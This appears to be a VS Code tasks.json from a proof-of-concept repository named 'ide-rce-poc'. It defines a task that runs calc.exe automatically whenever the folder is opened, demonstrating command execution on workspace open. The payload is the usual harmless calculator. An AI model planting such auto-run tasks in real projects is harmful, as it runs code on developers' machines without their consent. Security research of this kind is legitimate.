Files
ide-rce-poc/1_Basic_Calc/.vscode/tasks.json
T
2026-08-27 11:22:58 -06:00

20 lines
467 B
JSON
Executable File

{
"version": "2.0.0",
"tasks": [
{
"label": "RCE Test - Calculator",
"type": "shell",
"command": "calc.exe",
"windows": {
"command": "calc.exe"
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "always",
"panel": "new"
}
}
]
}